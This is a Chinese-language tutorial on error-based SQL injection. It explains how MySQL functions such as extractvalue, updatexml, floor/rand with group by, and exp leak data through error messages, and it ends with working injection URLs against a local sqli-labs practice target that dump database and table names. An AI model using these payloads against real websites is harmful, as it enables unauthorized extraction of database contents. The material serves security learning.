SQL隱碼攻擊教學之報錯注入

2022-02-22 13:02:27

SQL報錯注入概述

通過構造特定的SQL語句，讓攻擊者想要查詢的資訊（如資料庫名、版本號、使用者名稱等）通過頁面面的錯誤提示回顯出來。

報錯注入的前提條件

Web應用程式未關閉資料庫報錯函數，對於一些SQL語句的錯誤直接回顯在頁面上
後臺未對一些具有報錯功能的函數（如extractvalue、updatexml等）進行過濾

Xpath型別函數

extractvalue()

作用：對XML檔案進行查詢，相當於在HTML檔案中用標籤查詢元素。

語法: extractvalue( XML_document, XPath_string )

引數1：XML_document是String格式，為XML檔案物件的名稱
引數2：XPath_string(Xpath格式的字串)，注入時可操作的地方

報錯原理：xml檔案中查詢字元位置是用/xxx/xxx/xxx/...這種格式，如果寫入其他格式就會報錯，並且會返回寫入的非法格式內容，錯誤資訊如：XPATH syntax error:'xxxxxxxx‘

updatexml()

作用：改變檔案中符合條件的節點的值。

語法: updatexml( XML_document, XPath_string, new_value )

引數1：XML_document是String格式，為XML檔案物件的名稱
引數2：XPath_string(Xpath格式的字串)，注入時可操作的地方
引數3：new_value，String格式，替換查詢到的符合條件的資料

報錯原理:同extractvalue()

其他函數

floor()、rand()、count()、group by聯用

作用

floor(x)：對引數x向下取整

rand()：生成一個0～1之間的隨機浮點數

count(*)：統計某個表下總共有多少條記錄

group by x: 按照 (by) 一定的規則（x）進行分組

報錯原理：group by與rand()使用時，如果臨時表中沒有該主鍵，則在插入前會再計算一次rand()，然後再由group by將計算出來的主鍵直接插入到臨時表格中，導致主鍵重複報錯

exp()（5.5.5<= MySQL資料庫版本號<=5.5.49）

作用：計算以e（自然常數）為底的冪值

語法: exp(x)

報錯原理：當引數x超過710時，exp()函數會報錯，錯誤資訊如：DOUBLE value is of range:

MySQL資料庫報錯功能函數總彙

報錯注入範例

extractvalue()

依然用sqli/Less-1

直接用報錯函數進行暴庫操作

暴庫

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',database())) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

後面的步驟大致相同，不再演示

updatexml()

暴庫

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',database()),1) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+